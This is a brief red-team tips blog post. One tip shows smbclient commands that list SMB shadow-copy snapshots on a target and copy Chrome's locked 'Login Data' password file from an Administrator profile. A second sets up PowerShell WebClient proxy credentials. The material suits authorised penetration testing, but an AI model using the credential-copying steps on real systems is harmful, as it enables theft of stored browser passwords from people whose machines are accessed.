General Redteam & Pentest Tips

0001-01-01

Red Team , Tips

This post will have “in vrac” all of tips that I found useful.

Tip 1 : Access locked file through SMB

Wanna access some locked files through SMB ? You can try to see if some shadow copy is available on the targeted system !:

smbclient.py user@target list_snapshot

And then simply :

ls <@GMT-XXXX>\

For example, you can get the Login Data file which you can’t normally copy when Chrome is running :

copy  @GMT-2021.10.04-13.05.04\Users\Administrator\AppData\Local\Google\Chrome\Default\Login Data .

Tip 2 : Powershell with proxy

To use powershell with a corporate proxy :

$Wcl = new-object System.Net.WebClient
$Wcl.Headers.Add(“user-agent”, “PowerShell Script”)
$Wcl.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials

If the default creds is not working :

$Wcl=New-Object System.Net.WebClient
$Creds=Get-Credential
$Wcl.Proxy.Credentials=$Creds